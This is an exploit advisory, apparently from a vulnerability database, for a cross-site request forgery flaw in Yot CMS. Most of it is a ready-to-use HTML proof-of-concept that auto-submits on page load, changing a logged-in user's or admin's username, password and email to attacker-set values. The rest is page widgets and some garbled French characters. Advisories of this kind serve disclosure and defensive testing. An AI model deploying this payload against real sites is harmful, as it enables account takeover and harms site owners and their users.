YOT CMS Cross-Site Request Forgery - user profile changing

2019.02.11

ÃŕMąŃđÒ (SY)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Product : Yot CMS webapp
# Author : ÃŕMąŃđÒ - NullByteStream Team
# vendor homepage : https://sourceforge.net/projects/yot/
# Date : 10/2/2019
# Dork : N/A
##############################################################
This CSRF vulnerability allows attacker to change user/admin account details ( username , password .... )
Exploit :
<html>
<body onload='document.forms[0].submit()'>
<form action="http://site.com/index.php?page=user&op=do_profil" method="POST" name="user_form" enctype="multipart/form-data" OnSubmit='return user_form_verifchamps();'>
<table name="user_form" class="tabform" cellpadding="1" align="center" ><tr><td valign="top"><label>Pseudo</label> :</td><td valign="top"><input type="text" name="user" value="newusername" size="30" /> * </td></tr><tr><td valign="top"><label>Pr�nom</label> :</td><td valign="top"><input type="text" name="firstname" value="armando" size="30" /></td></tr><tr><td valign="top"><label>Nom</label> :</td><td valign="top"><input type="text" name="name" value="syria" size="30" /></td></tr><tr><td valign="top"><label>Mot de passe</label> :</td><td valign="top"><input type="password" name="pass1" value="newpassword" size="30" /></td></tr><tr><td valign="top"><label>Retaper mot de passe</label> :</td><td valign="top"><input type="password" name="pass2" value="newpassword" size="30" /></td></tr><tr><td valign="top"><label>Email</label> :</td><td valign="top"><input type="text" name="mail" value="MyEmail@server.com" size="30" /> * </td></tr><tr><td valign="top"><label>URL Avatar</label> :</td><td valign="top"><input type="text" name="avatar" value="" size="30" /></td></tr><tr><td valign="top"><label>T�l�charger un avatar</label> :</td><td valign="top"><input type="file" name="upload_avatar" /></td></tr><tr><td valign="top"><label>Th�me</label> :</td><td valign="top"><select name="theme"><option value="" selected></option><option value="coolbad" >coolbad</option><option value="coolbad_jaune" >coolbad_jaune</option><option value="yot3" >yot3</option></select></td></tr><tr><td valign="top"><label>Pr�venir par email d'une nouvelle news</label> :</td><td valign="top"><input type="radio" name="mailnews" value="1" />Oui&nbsp;&nbsp;<input type="radio" name="mailnews" value="0" checked />Non&nbsp;&nbsp;</td></tr></table>
<div align="center">(*) Champs obligatoires<br/><br/><input type="submit" value="Modifier"/></div>
</form>
###############################################################
NBS Team
http;//nullbytestream.tk
###############################################################

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

YOT CMS Cross-Site Request Forgery - user profile changing

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.